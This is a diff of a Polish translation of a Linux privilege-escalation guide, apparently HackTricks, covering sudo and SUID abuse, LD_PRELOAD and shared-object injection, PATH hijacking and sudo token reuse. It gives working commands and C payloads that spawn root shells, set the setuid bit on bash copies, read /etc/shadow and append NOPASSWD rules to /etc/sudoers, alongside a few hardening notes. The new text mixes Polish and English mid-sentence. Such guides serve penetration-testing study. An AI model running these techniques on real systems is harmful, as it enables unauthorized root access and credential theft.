-## **RunC** eskalacja uprawnień
+## **RunC** privilege escalation
 
-Jeśli możesz użyć polecenia **`runc`**, przeczytaj następującą stronę — **możesz być w stanie wykorzystać je do eskalacji uprawnień**:
+Jeśli odkryjesz, że możesz użyć polecenia **`runc`**, przeczytaj następującą stronę, ponieważ **you may be able to abuse it to escalate privileges**:
 
 
 {{#ref}}
@@ -621,15 +621,15 @@ runc-privilege-escalation.md
 
 ## **D-Bus**
 
-D-Bus to zaawansowany system **inter-Process Communication (IPC)**, który umożliwia aplikacjom efektywną interakcję i wymianę danych. Zaprojektowany z myślą o nowoczesnym systemie Linux, oferuje solidne ramy dla różnych form komunikacji między aplikacjami.
+D-Bus jest zaawansowanym **inter-Process Communication (IPC) system**, który umożliwia aplikacjom efektywną interakcję i wymianę danych. Zaprojektowany z myślą o nowoczesnym systemie Linux, oferuje solidne ramy dla różnych form komunikacji między aplikacjami.
 
-System jest wszechstronny, obsługuje podstawową IPC, która poprawia wymianę danych między procesami, przypominając **enhanced UNIX domain sockets**. Ponadto pomaga w rozgłaszaniu zdarzeń lub sygnałów, ułatwiając płynną integrację między komponentami systemu. Na przykład sygnał od demona Bluetooth o przychodzącym połączeniu może spowodować wyciszenie odtwarzacza muzyki, poprawiając doświadczenie użytkownika. Dodatkowo D-Bus obsługuje system zdalnych obiektów, upraszczając żądania usług i wywołania metod między aplikacjami, usprawniając procesy, które wcześniej były skomplikowane.
+System jest wszechstronny, wspiera podstawowe IPC, które usprawnia wymianę danych między procesami, przypominając **enhanced UNIX domain sockets**. Ponadto pomaga w rozgłaszaniu zdarzeń lub sygnałów, ułatwiając bezproblemową integrację komponentów systemu. Na przykład sygnał od demona Bluetooth o przychodzącym połączeniu może spowodować wyciszenie odtwarzacza muzyki, poprawiając doświadczenie użytkownika. Dodatkowo D-Bus obsługuje system zdalnych obiektów, upraszczając żądania usług i wywołania metod między aplikacjami, usprawniając procesy, które wcześniej były skomplikowane.
 
-D-Bus działa w modelu **allow/deny**, zarządzając uprawnieniami do wiadomości (wywołania metod, emisje sygnałów, itd.) na podstawie skumulowanego efektu pasujących reguł polityki. Te polityki określają interakcje z bus, co może potencjalnie umożliwić eskalację uprawnień poprzez nadużycie tych zezwoleń.
+D-Bus działa na zasadzie **allow/deny model**, zarządzając uprawnieniami wiadomości (wywołania metod, emisje sygnałów itp.) na podstawie skumulowanego efektu dopasowujących się reguł polityki. Te polityki określają interakcje z bus, co potencjalnie może umożliwić privilege escalation poprzez wykorzystanie tych uprawnień.
 
-Przykład takiej polityki w /etc/dbus-1/system.d/wpa_supplicant.conf pokazano poniżej — opisuje uprawnienia użytkownika root do posiadania, wysyłania i odbierania wiadomości od `fi.w1.wpa_supplicant1`.
+Przykład takiej polityki w `/etc/dbus-1/system.d/wpa_supplicant.conf` został podany, opisując uprawnienia dla użytkownika root do posiadania, wysyłania i odbierania wiadomości od `fi.w1.wpa_supplicant1`.
 
-Polityki bez określonego użytkownika lub grupy stosują się uniwersalnie, podczas gdy polityki w kontekście "default" dotyczą wszystkich, którzy nie są objęci innymi, konkretnymi politykami.
+Polityki bez określonego użytkownika lub grupy mają zastosowanie uniwersalnie, podczas gdy polityki z kontekstem "default" dotyczą wszystkich nieobjętych innymi, bardziej szczegółowymi politykami.
 ```xml
 <policy user="root">
 <allow own="fi.w1.wpa_supplicant1"/>
@@ -638,7 +638,7 @@ Polityki bez określonego użytkownika lub grupy stosują się uniwersalnie, pod
 <allow receive_sender="fi.w1.wpa_supplicant1" receive_type="signal"/>
 </policy>
 ```
-**Dowiedz się tutaj, jak enumerate i exploit komunikację D-Bus:**
+**Dowiedz się, jak enumerate i exploit D-Bus communication tutaj:**
 
 
 {{#ref}}
@@ -647,9 +647,9 @@ d-bus-enumeration-and-command-injection-privilege-escalation.md
 
 ## **Sieć**
 
-Zawsze warto enumerate sieci i określić pozycję maszyny.
+Zawsze warto enumerate sieć i ustalić pozycję maszyny.
 
-### Ogólna enumeration
+### Ogólne enumeration
 ```bash
 #Hostname, hosts and DNS
 cat /etc/hostname /etc/hosts /etc/resolv.conf
@@ -672,16 +672,16 @@ cat /etc/networks
 #Files used by network services
 lsof -i
 ```
-### Otwarte porty
+### Open ports
 
-Zawsze sprawdź usługi sieciowe działające na maszynie, z którymi nie mogłeś wcześniej wchodzić w interakcję przed uzyskaniem do niej dostępu:
+Zawsze sprawdź network services uruchomione na maszynie, z którymi nie mogłeś wchodzić w interakcję przed uzyskaniem do niej dostępu:
 ```bash
 (netstat -punta || ss --ntpu)
 (netstat -punta || ss --ntpu) | grep "127.0"
 ```
 ### Sniffing
 
-Sprawdź, czy możesz sniff traffic. Jeśli tak, możesz być w stanie przechwycić jakieś poświadczenia.
+Sprawdź, czy możesz sniff traffic. Jeśli tak, możesz przechwycić jakieś credentials.
 ```
 timeout 1 tcpdump
 ```
@@ -689,7 +689,7 @@ timeout 1 tcpdump
 
 ### Ogólna enumeracja
 
-Sprawdź, **who** jesteś, jakie masz **privileges**, jacy **users** są w systemie, którzy mogą **login** i którzy mają **root privileges**:
+Sprawdź, kim jesteś, jakie masz **privileges**, którzy **users** są w systemach, którzy mogą **login** i którzy mają **root privileges**:
 ```bash
 #Info about me
 id || (whoami && groups) 2>/dev/null
@@ -713,12 +713,12 @@ gpg --list-keys 2>/dev/null
 ```
 ### Duży UID
 
-Niektóre wersje Linuksa były podatne na błąd, który pozwala użytkownikom z **UID > INT_MAX** eskalować uprawnienia. Więcej informacji: [here](https://gitlab.freedesktop.org/polkit/polkit/issues/74), [here](https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh) and [here](https://twitter.com/paragonsec/status/1071152249529884674).\
-**Exploit it** używając: **`systemd-run -t /bin/bash`**
+Niektóre wersje Linuksa były dotknięte błędem, który pozwala użytkownikom z **UID > INT_MAX** na eskalację uprawnień. More info: [here](https://gitlab.freedesktop.org/polkit/polkit/issues/74), [here](https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh) and [here](https://twitter.com/paragonsec/status/1071152249529884674).\
+Wykorzystaj to używając: **`systemd-run -t /bin/bash`**
 
 ### Grupy
 
-Sprawdź, czy jesteś **członkiem jakiejś grupy**, która mogłaby przyznać Ci uprawnienia roota:
+Sprawdź, czy jesteś **członkiem jakiejś grupy**, która mogłaby przyznać Ci root privileges:
 
 
 {{#ref}}
@@ -727,7 +727,7 @@ interesting-groups-linux-pe/
 
 ### Schowek
 
-Sprawdź, czy w schowku nie ma nic interesującego (jeśli to możliwe)
+Sprawdź, czy w schowku znajduje się coś interesującego (jeśli to możliwe)
 ```bash
 if [ `which xclip 2>/dev/null` ]; then
 echo "Clipboard: "`xclip -o -selection clipboard 2>/dev/null`
@@ -744,27 +744,27 @@ grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/logi
 ```
 ### Znane hasła
 
-Jeśli **znasz jakiekolwiek hasło** środowiska **spróbuj zalogować się jako każdy użytkownik** używając tego hasła.
+Jeśli **znasz jakiekolwiek hasło** w środowisku, **spróbuj zalogować się jako każdy użytkownik** używając tego hasła.
 
 ### Su Brute
 
-Jeżeli nie przeszkadza Ci generowanie dużego hałasu i na komputerze są dostępne binarki `su` i `timeout`, możesz spróbować przeprowadzić brute-force użytkownika używając [su-bruteforce](https://github.com/carlospolop/su-bruteforce).\
-[**Linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) z parametrem `-a` również próbuje przeprowadzać brute-force na użytkownikach.
+Jeśli nie przeszkadza Ci generowanie dużo hałasu i na komputerze są dostępne binaria `su` i `timeout`, możesz spróbować przeprowadzić brute-force użytkownika używając [su-bruteforce](https://github.com/carlospolop/su-bruteforce).\
+[**Linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) z parametrem `-a` również próbuje brute-force'ować użytkowników.
 
-## Nadużycia zapisywalnego PATH
+## Nadużycia zapisywalnego $PATH
 
 ### $PATH
 
-Jeśli znajdziesz, że możesz **zapisywać w jakimś folderze z $PATH** możesz być w stanie eskalować uprawnienia poprzez **utworzenie backdoor w zapisywalnym folderze** o nazwie jakiegoś polecenia, które ma być wykonywane przez innego użytkownika (najlepiej root) i które **nie jest ładowane z folderu, który znajduje się wcześniej** w $PATH niż twój zapisywalny folder.
+Jeśli odkryjesz, że możesz **zapisywać w jakimś katalogu znajdującym się w $PATH**, możesz być w stanie eskalować uprawnienia przez **utworzenie backdoora w zapisywalnym katalogu** o nazwie odpowiadającej komendzie, która zostanie wykonana przez innego użytkownika (najlepiej root) i która **nie jest ładowana z katalogu znajdującego się wcześniej** niż twój zapisywalny katalog w $PATH.
 
-### SUDO i SUID
+### SUDO and SUID
 
-Możesz mieć pozwolenie na uruchomienie pewnego polecenia za pomocą sudo lub polecenia mogą mieć ustawiony bit suid. Sprawdź to używając:
+Możesz mieć pozwolenie na wykonanie pewnej komendy za pomocą sudo lub plik może mieć ustawiony bit suid. Sprawdź to używając:
 ```bash
 sudo -l #Check commands you can execute with sudo
 find / -perm -4000 2>/dev/null #Find all SUID binaries
 ```
-Niektóre **nieoczekiwane polecenia pozwalają na odczyt i/lub zapis plików, a nawet wykonanie polecenia.** Na przykład:
+Niektóre **nieoczekiwane polecenia pozwalają na odczyt i/lub zapis plików lub nawet wykonanie polecenia.** Na przykład:
 ```bash
 sudo awk 'BEGIN {system("/bin/sh")}'
 sudo find /etc -exec sh -i \;
@@ -775,13 +775,13 @@ less>! <shell_comand>
 ```
 ### NOPASSWD
 
-Konfiguracja sudo może pozwolić użytkownikowi na uruchomienie pewnego polecenia z uprawnieniami innego użytkownika bez podawania hasła.
+Konfiguracja sudo może pozwolić użytkownikowi na uruchomienie pewnego polecenia z uprawnieniami innego użytkownika bez znajomości hasła.
 ```
 $ sudo -l
 User demo may run the following commands on crashlab:
 (root) NOPASSWD: /usr/bin/vim
 ```
-W tym przykładzie użytkownik `demo` może uruchomić `vim` jako `root`. Zdobycie `shell` jest teraz trywialne — wystarczy dodać klucz ssh do katalogu `root` lub wywołać `sh`.
+W tym przykładzie użytkownik `demo` może uruchamiać `vim` jako `root`, dzięki czemu uzyskanie powłoki jest trywialne przez dodanie ssh key do root directory lub wywołanie `sh`.
 ```
 sudo vim -c '!sh'
 ```
@@ -793,18 +793,18 @@ $ sudo -l
 User waldo may run the following commands on admirer:
 (ALL) SETENV: /opt/scripts/admin_tasks.sh
 ```
-Ten przykład, **oparty na HTB machine Admirer**, był **podatny** na **PYTHONPATH hijacking**, umożliwiając załadowanie dowolnej biblioteki python podczas uruchamiania skryptu jako root:
+Ten przykład, **oparty na HTB machine Admirer**, był **podatny** na **PYTHONPATH hijacking**, co pozwalało na załadowanie dowolnej biblioteki python podczas wykonywania skryptu jako root:
 ```bash
 sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh
 ```
 ### BASH_ENV zachowane przez sudo env_keep → root shell
 
-Jeśli sudoers zachowuje `BASH_ENV` (np. `Defaults env_keep+="ENV BASH_ENV"`), możesz wykorzystać zachowanie Bash przy uruchamianiu nieinteraktywnym, aby uruchomić dowolny kod jako root podczas wywoływania dozwolonego polecenia.
+If sudoers preserves `BASH_ENV` (e.g., `Defaults env_keep+="ENV BASH_ENV"`), you can leverage Bash’s non-interactive startup behavior to run arbitrary code as root when invoking an allowed command.
 
-- Dlaczego to działa: Dla powłok nieinteraktywnych Bash ocenia `$BASH_ENV` i wczytuje ten plik przed uruchomieniem docelowego skryptu. Wiele reguł sudo pozwala na uruchomienie skryptu lub wrappera powłoki. Jeśli `BASH_ENV` jest zachowane przez sudo, twój plik zostanie wczytany z uprawnieniami roota.
+- Dlaczego to działa: Dla nieinteraktywnych powłok Bash odczytuje `$BASH_ENV` i wykonuje (sources) ten plik przed uruchomieniem docelowego skryptu. Wiele reguł sudo pozwala na uruchomienie skryptu lub wrappera powłoki. Jeśli `BASH_ENV` jest zachowane przez sudo, twój plik zostanie załadowany z uprawnieniami roota.
 
 - Wymagania:
-- Reguła sudo, którą możesz uruchomić (dowolny cel wywołujący `/bin/bash` nieinteraktywnie lub dowolny skrypt bash).
+- Reguła sudo, którą możesz uruchomić (dowolny target, który wywołuje `/bin/bash` w trybie nieinteraktywnym, lub dowolny bash script).
 - `BASH_ENV` obecne w `env_keep` (sprawdź za pomocą `sudo -l`).
 
 - PoC:
@@ -817,14 +817,14 @@ chmod +x /dev/shm/shell.sh
 BASH_ENV=/dev/shm/shell.sh sudo /usr/bin/systeminfo   # or any permitted script/binary that triggers bash
 # You should now have a root shell
 ```
-- Wzmocnienie zabezpieczeń:
-- Usuń `BASH_ENV` (i `ENV`) z `env_keep`, stosuj `env_reset`.
+- Umacnianie:
+- Usuń `BASH_ENV` (oraz `ENV`) z `env_keep`; stosuj `env_reset`.
 - Unikaj wrapperów powłoki dla poleceń dozwolonych przez sudo; używaj minimalnych binarek.
-- Rozważ logowanie I/O sudo i alertowanie, gdy wykorzystywane są zachowane zmienne środowiskowe.
+- Rozważ logowanie I/O przez sudo i powiadamianie, gdy używane są zachowane zmienne środowiskowe.
 
-### Ścieżki omijające wykonanie przez sudo
+### Ścieżki omijania wykonywania sudo
 
-**Przejdź** żeby przeczytać inne pliki lub użyj **dowiązań symbolicznych**. Na przykład w pliku sudoers: _hacker10 ALL= (root) /bin/less /var/log/\*_
+**Przejdź** aby przeczytać inne pliki lub użyj **symlinków**. Na przykład w pliku sudoers: _hacker10 ALL= (root) /bin/less /var/log/\*_
 ```bash
 sudo less /var/logs/anything
 less>:e /etc/shadow #Jump to read other files using privileged less
@@ -841,39 +841,39 @@ sudo less /var/log/something /etc/shadow #Red 2 files
 ```
 **Środki zaradcze**: [https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/](https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/)
 
-### Sudo command/SUID binary bez określonej ścieżki polecenia
+### Sudo command/SUID binary without command path
 
-Jeśli **uprawnienie sudo** jest przyznane dla pojedynczego polecenia **bez określenia ścieżki**: _hacker10 ALL= (root) less_ możesz je wykorzystać, zmieniając zmienną PATH.
+Jeśli **sudo permission** jest nadane dla pojedynczego polecenia **bez określenia ścieżki**: _hacker10 ALL= (root) less_ możesz to wykorzystać, zmieniając zmienną PATH
 ```bash
 export PATH=/tmp:$PATH
 #Put your backdoor in /tmp and name it "less"
 sudo less
 ```
-Technikę tę można również zastosować, jeśli **suid** binary **wykonuje inne polecenie bez podania jego ścieżki (zawsze sprawdź za pomocą** _**strings**_ **zawartość dziwnego pliku SUID)**).
+Ta technika może być również użyta, jeśli **suid** binary **wykonuje inne polecenie bez określenia jego ścieżki (zawsze sprawdź za pomocą** _**strings**_ **zawartość dziwnego SUID binary)**.
 
 [Payload examples to execute.](payloads-to-execute.md)
 
-### SUID binary with command path
+### SUID binary z podaną ścieżką do polecenia
 
-Jeżeli **suid** binary **wykonuje inne polecenie, podając ścieżkę**, możesz spróbować **eksportować funkcję** nazwaną tak, jak polecenie, które wywołuje plik suid.
+Jeśli **suid** binary **wykonuje inne polecenie, podając ścieżkę**, możesz spróbować **wyeksportować funkcję** nazwaną tak, jak polecenie, które wywołuje suid file.
 
-Na przykład, jeśli suid binary wywołuje _**/usr/sbin/service apache2 start**_ musisz spróbować utworzyć funkcję i ją wyeksportować:
+For example, if a suid binary calls _**/usr/sbin/service apache2 start**_ you have to try to create the function and export it:
 ```bash
 function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
 export -f /usr/sbin/service
 ```
-Następnie, kiedy wywołasz binarkę suid, ta funkcja zostanie wykonana
+Następnie, gdy wywołasz suid binary, ta funkcja zostanie wykonana
 
 ### LD_PRELOAD & **LD_LIBRARY_PATH**
 
-Zmienna środowiskowa **LD_PRELOAD** służy do wskazania jednej lub większej liczby bibliotek współdzielonych (.so files), które loader ma załadować przed wszystkimi innymi, w tym przed standardową biblioteką C (`libc.so`). Ten proces nazywa się wstępnym ładowaniem biblioteki.
+Zmienna środowiskowa **LD_PRELOAD** służy do określenia jednej lub więcej bibliotek współdzielonych (pliki .so), które mają zostać załadowane przez loader przed wszystkimi innymi, w tym przed standardową biblioteką C (`libc.so`). Ten proces jest znany jako wstępne ładowanie biblioteki.
 
-Jednak, aby utrzymać bezpieczeństwo systemu i zapobiec wykorzystaniu tej funkcji, szczególnie w przypadku wykonywalnych plików **suid/sgid**, system wymusza pewne warunki:
+Jednakże, aby utrzymać bezpieczeństwo systemu i zapobiec wykorzystaniu tej funkcji, szczególnie w przypadku plików wykonywalnych **suid/sgid**, system narzuca pewne warunki:
 
-- Loader ignoruje **LD_PRELOAD** dla wykonywalnych plików, w których rzeczywisty identyfikator użytkownika (_ruid_) nie zgadza się z efektywnym identyfikatorem użytkownika (_euid_).
-- Dla plików wykonywalnych z suid/sgid wstępnie ładowane są tylko biblioteki znajdujące się w standardowych ścieżkach, które same są suid/sgid.
+- Loader ignoruje **LD_PRELOAD** dla plików wykonywalnych, w których realny identyfikator użytkownika (_ruid_) nie zgadza się z efektywnym identyfikatorem użytkownika (_euid_).
+- Dla plików wykonywalnych z suid/sgid, preloadowane są jedynie biblioteki znajdujące się w standardowych ścieżkach, które same są suid/sgid.
 
-Privilege escalation może wystąpić, jeśli masz możliwość wykonywania poleceń z użyciem `sudo` i wynik `sudo -l` zawiera wpis **env_keep+=LD_PRELOAD**. Ta konfiguracja pozwala, aby zmienna środowiskowa **LD_PRELOAD** utrzymywała się i była rozpoznawana nawet podczas uruchamiania poleceń przez `sudo`, co potencjalnie może prowadzić do wykonania dowolnego kodu z podwyższonymi uprawnieniami.
+Privilege escalation może wystąpić, jeśli masz możliwość wykonywania poleceń za pomocą `sudo` i wynik `sudo -l` zawiera stwierdzenie **env_keep+=LD_PRELOAD**. Ta konfiguracja pozwala, by zmienna środowiskowa **LD_PRELOAD** była zachowana i rozpoznawana nawet wtedy, gdy polecenia są uruchamiane z użyciem `sudo`, co potencjalnie może prowadzić do wykonania dowolnego kodu z podwyższonymi uprawnieniami.
 ```
 Defaults        env_keep += LD_PRELOAD
 ```
@@ -890,17 +890,17 @@ setuid(0);
 system("/bin/bash");
 }
 ```
-Następnie **compile it** przy użyciu:
+Następnie **skompiluj to** używając:
 ```bash
 cd /tmp
 gcc -fPIC -shared -o pe.so pe.c -nostartfiles
 ```
-Na koniec, **escalate privileges** uruchamiając
+Na koniec, **escalate privileges** running
 ```bash
 sudo LD_PRELOAD=./pe.so <COMMAND> #Use any command you can run with sudo
 ```
 > [!CAUTION]
-> Podobny privesc można wykorzystać, jeśli atakujący kontroluje zmienną środowiskową **LD_LIBRARY_PATH**, ponieważ kontroluje ścieżkę, w której będą wyszukiwane biblioteki.
+> Podobny privesc może zostać wykorzystany, jeśli atakujący kontroluje env variable **LD_LIBRARY_PATH**, ponieważ kontroluje ścieżkę, w której będą wyszukiwane biblioteki.
 ```c
 #include <stdio.h>
 #include <stdlib.h>
@@ -922,11 +922,11 @@ sudo LD_LIBRARY_PATH=/tmp <COMMAND>
 ```
 ### SUID Binary – .so injection
 
-Jeśli napotkasz binary z uprawnieniami **SUID**, które wydają się nietypowe, warto sprawdzić, czy poprawnie ładuje pliki **.so**. Można to zweryfikować, uruchamiając następujące polecenie:
+Gdy natkniesz się na binary z uprawnieniami **SUID**, które wydają się nietypowe, dobrą praktyką jest sprawdzenie, czy poprawnie ładuje pliki **.so**. Można to sprawdzić, uruchamiając następujące polecenie:
 ```bash
 strace <SUID-BINARY> 2>&1 | grep -i -E "open|access|no such file"
 ```
-Na przykład, napotkanie błędu takiego jak _"open(“/path/to/.config/libcalc.so”, O_RDONLY) = -1 ENOENT (No such file or directory)"_ sugeruje potencjalną możliwość wykorzystania.
+Na przykład, napotkanie błędu takiego jak _"open(“/path/to/.config/libcalc.so”, O_RDONLY) = -1 ENOENT (No such file or directory)"_ sugeruje możliwość eksploatacji.
 
 Aby to wykorzystać, należy stworzyć plik C, np. _"/path/to/.config/libcalc.c"_, zawierający następujący kod:
 ```c
@@ -939,13 +939,13 @@ void inject(){
 system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
 }
 ```
-Ten kod, po skompilowaniu i uruchomieniu, ma na celu podniesienie uprawnień poprzez manipulowanie uprawnieniami plików i uruchomienie powłoki z podwyższonymi uprawnieniami.
+Ten kod, po skompilowaniu i uruchomieniu, ma na celu eskalację uprawnień poprzez manipulację uprawnieniami plików i uruchomienie shella z podwyższonymi uprawnieniami.
 
-Skompiluj powyższy plik C do pliku obiektu współdzielonego (.so) za pomocą:
+Skompiluj powyższy plik C do pliku shared object (.so) za pomocą:
 ```bash
 gcc -shared -o /path/to/.config/libcalc.so -fPIC /path/to/.config/libcalc.c
 ```
-Na koniec uruchomienie dotkniętego SUID binary powinno wywołać exploit, umożliwiając potencjalne przejęcie systemu.
+W końcu uruchomienie podatnego SUID binary powinno wywołać exploit, umożliwiając potencjalne przejęcie systemu.
 
 ## Shared Object Hijacking
 ```bash
@@ -957,7 +957,7 @@ something.so => /lib/x86_64-linux-gnu/something.so
 readelf -d payroll  | grep PATH
 0x000000000000001d (RUNPATH)            Library runpath: [/development]
 ```
-Teraz, gdy znaleźliśmy SUID binary, który ładuje bibliotekę z folderu, do którego możemy zapisywać, utwórzmy bibliotekę w tym folderze o wymaganej nazwie:
+Teraz, gdy znaleźliśmy SUID binary, który ładuje library z folderu, do którego mamy uprawnienia zapisu, utwórzmy library w tym folderze pod odpowiednią nazwą:
 ```c
 //gcc src.c -fPIC -shared -o /development/libshared.so
 #include <stdio.h>
@@ -974,13 +974,13 @@ Jeśli otrzymasz błąd taki jak
 ```shell-session
 ./suid_bin: symbol lookup error: ./suid_bin: undefined symbol: a_function_name
 ```
-to oznacza, że biblioteka, którą wygenerowałeś, musi zawierać funkcję o nazwie `a_function_name`.
+to oznacza, że biblioteka, którą wygenerowałeś, musi posiadać funkcję o nazwie `a_function_name`.
 
 ### GTFOBins
 
-[**GTFOBins**](https://gtfobins.github.io) to skuratorowana lista binarek Unix, które mogą być wykorzystane przez atakującego do obejścia lokalnych ograniczeń bezpieczeństwa. [**GTFOArgs**](https://gtfoargs.github.io/) to to samo, ale dla przypadków, gdy możesz **tylko wstrzykiwać argumenty** w polecenie.
+[**GTFOBins**](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. [**GTFOArgs**](https://gtfoargs.github.io/) is the same but for cases where you can **możesz tylko wstrzykiwać argumenty** in a command.
 
-Projekt zbiera legalne funkcje binarek Unix, które można nadużyć, aby wydostać się z ograniczonych shelli, eskalować lub utrzymać podwyższone uprawnienia, przesyłać pliki, uruchamiać bind i reverse shelle oraz ułatwiać inne zadania post-exploitation.
+The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.
 
 > gdb -nx -ex '!sh' -ex quit\
 > sudo mysql -e '! /bin/sh'\
@@ -999,55 +999,55 @@ https://gtfoargs.github.io/
 
 ### FallOfSudo
 
-Jeśli masz dostęp do `sudo -l` możesz użyć narzędzia [**FallOfSudo**](https://github.com/CyberOne-Security/FallofSudo) aby sprawdzić, czy znajdzie sposób na wykorzystanie jakiejkolwiek reguły sudo.
+If you can access `sudo -l` you can use the tool [**FallOfSudo**](https://github.com/CyberOne-Security/FallofSudo) to check if it finds how to exploit any sudo rule.
 
 ### Reusing Sudo Tokens
 
-W przypadkach, gdy masz **sudo access** ale nie znasz hasła, możesz eskalować uprawnienia przez **oczekiwanie na wykonanie polecenia sudo i przejęcie tokenu sesji**.
+W przypadkach, kiedy masz **sudo access** ale nie znasz hasła, możesz eskalować uprawnienia przez **waiting for a sudo command execution and then hijacking the session token**.
 
-Wymagania do eskalacji uprawnień:
+Requirements to escalate privileges:
 
 - Masz już shell jako użytkownik "_sampleuser_"
-- "_sampleuser_" użył **`sudo`** do wykonania czegoś w **ostatnich 15 minutach** (domyślnie to czas trwania tokenu sudo, który pozwala używać `sudo` bez podawania hasła)
-- `cat /proc/sys/kernel/yama/ptrace_scope` zwraca 0
-- `gdb` jest dostępny (możesz je przesłać)
+- "_sampleuser_" użył **`sudo`** do wykonania czegoś w **ostatnich 15 minutach** (domyślnie to czas trwania tokenu sudo, który pozwala używać `sudo` bez wprowadzania hasła)
+- `cat /proc/sys/kernel/yama/ptrace_scope` jest 0
+- `gdb` jest dostępny (możesz go wgrać)
 
-(Możesz tymczasowo włączyć `ptrace_scope` przy pomocy `echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope` lub trwale modyfikując `/etc/sysctl.d/10-ptrace.conf` i ustawiając `kernel.yama.ptrace_scope = 0`)
+(Możesz tymczasowo włączyć `ptrace_scope` z `echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope` lub trwale modyfikując `/etc/sysctl.d/10-ptrace.conf` i ustawiając `kernel.yama.ptrace_scope = 0`)
 
-Jeśli wszystkie te wymagania są spełnione, **możesz eskalować uprawnienia używając:** [**https://github.com/nongiach/sudo_inject**](https://github.com/nongiach/sudo_inject)
+If all these requirements are met, **you can escalate privileges using:** [**https://github.com/nongiach/sudo_inject**](https://github.com/nongiach/sudo_inject)
 
-- Pierwszy **exploit** (`exploit.sh`) utworzy binarkę `activate_sudo_token` w _/tmp_. Możesz jej użyć, aby **aktywować token sudo w swojej sesji** (nie otrzymasz automatycznie powłoki roota, uruchom `sudo su`):
+- The **first exploit** (`exploit.sh`) will create the binary `activate_sudo_token` in _/tmp_. You can use it to **activate the sudo token in your session** (you won't get automatically a root shell, do `sudo su`):
 ```bash
 bash exploit.sh
 /tmp/activate_sudo_token
 sudo su
 ```
-- **Drugi exploit** (`exploit_v2.sh`) utworzy powłokę sh w _/tmp_ **należącą do root z setuid**
+- Drugi **exploit** (`exploit_v2.sh`) utworzy sh shell w _/tmp_ **owned by root with setuid**
 ```bash
 bash exploit_v2.sh
 /tmp/sh -p
 ```
-- **Trzeci exploit** (`exploit_v3.sh`) utworzy **sudoers file**, który sprawi, że **sudo tokens będą wieczne i pozwoli wszystkim użytkownikom używać sudo**
+- **Trzeci exploit** (`exploit_v3.sh`) **utworzy sudoers file**, który sprawi, że **sudo tokens będą wieczne i pozwoli wszystkim użytkownikom używać sudo**
 ```bash
 bash exploit_v3.sh
 sudo su
 ```
 ### /var/run/sudo/ts/\<Username>
 
-Jeśli masz **uprawnienia do zapisu** w folderze lub na któregokolwiek z utworzonych w nim plików możesz użyć binarki [**write_sudo_token**](https://github.com/nongiach/sudo_inject/tree/master/extra_tools) aby **utworzyć token sudo dla użytkownika i PID**.\
-Na przykład, jeśli możesz nadpisać plik _/var/run/sudo/ts/sampleuser_ i masz shell jako ten użytkownik z PID 1234, możesz **uzyskać uprawnienia sudo** bez konieczności znajomości hasła, wykonując:
+Jeżeli masz **write permissions** w folderze lub na którymkolwiek z utworzonych w nim plików, możesz użyć binarki [**write_sudo_token**](https://github.com/nongiach/sudo_inject/tree/master/extra_tools) aby **create a sudo token for a user and PID**.\
+Na przykład, jeśli możesz nadpisać plik _/var/run/sudo/ts/sampleuser_ i masz shell jako ten użytkownik z PID 1234, możesz **obtain sudo privileges** bez potrzeby znajomości hasła wykonując:
 ```bash
 ./write_sudo_token 1234 > /var/run/sudo/ts/sampleuser
 ```
 ### /etc/sudoers, /etc/sudoers.d
 
-Plik `/etc/sudoers` i pliki wewnątrz `/etc/sudoers.d` konfigurują, kto może używać `sudo` i w jaki sposób. Te pliki **domyślnie mogą być odczytywane tylko przez użytkownika root i grupę root**.\
-**Jeśli** możesz **odczytać** ten plik, możesz być w stanie **uzyskać pewne interesujące informacje**, a jeśli możesz **zapisać** dowolny plik, będziesz w stanie **eskalować uprawnienia**.
+Plik `/etc/sudoers` oraz pliki w katalogu `/etc/sudoers.d` określają, kto może używać `sudo` i w jaki sposób. Te pliki **domyślnie mogą być odczytywane tylko przez użytkownika root i grupę root**.\
+**Jeśli** możesz **odczytać** ten plik, możesz być w stanie **uzyskać przydatne informacje**, a jeśli możesz **zapisać** dowolny plik, będziesz w stanie **escalate privileges**.
 ```bash
 ls -l /etc/sudoers /etc/sudoers.d/
 ls -ld /etc/sudoers.d/
 ```
-Jeśli masz uprawnienie do zapisu, możesz je nadużyć.
+Jeśli możesz zapisywać, możesz nadużyć tego uprawnienia.
 ```bash
 echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers
 echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers.d/README
@@ -1061,17 +1061,17 @@ echo "Defaults timestamp_timeout=-1" >> /etc/sudoers.d/win
 ```
 ### DOAS
 
-Istnieją alternatywy dla binarki `sudo`, takie jak `doas` dla OpenBSD — pamiętaj, aby sprawdzić konfigurację w `/etc/doas.conf`
+Istnieją alternatywy dla binarki `sudo`, takie jak `doas` w OpenBSD — pamiętaj, aby sprawdzić jego konfigurację w /etc/doas.conf
 ```
 permit nopass demo as root cmd vim
 ```
 ### Sudo Hijacking
 
-Jeśli wiesz, że **użytkownik zwykle łączy się z maszyną i używa `sudo`** do eskalacji uprawnień i uzyskałeś shell w kontekście tego użytkownika, możesz **utworzyć nowy plik wykonywalny sudo**, który wykona twój kod jako root, a potem polecenie użytkownika. Następnie, **zmodyfikuj $PATH** kontekstu użytkownika (na przykład dodając nową ścieżkę w .bash_profile) tak, aby gdy użytkownik uruchomi sudo, twój plik sudo został wykonany.
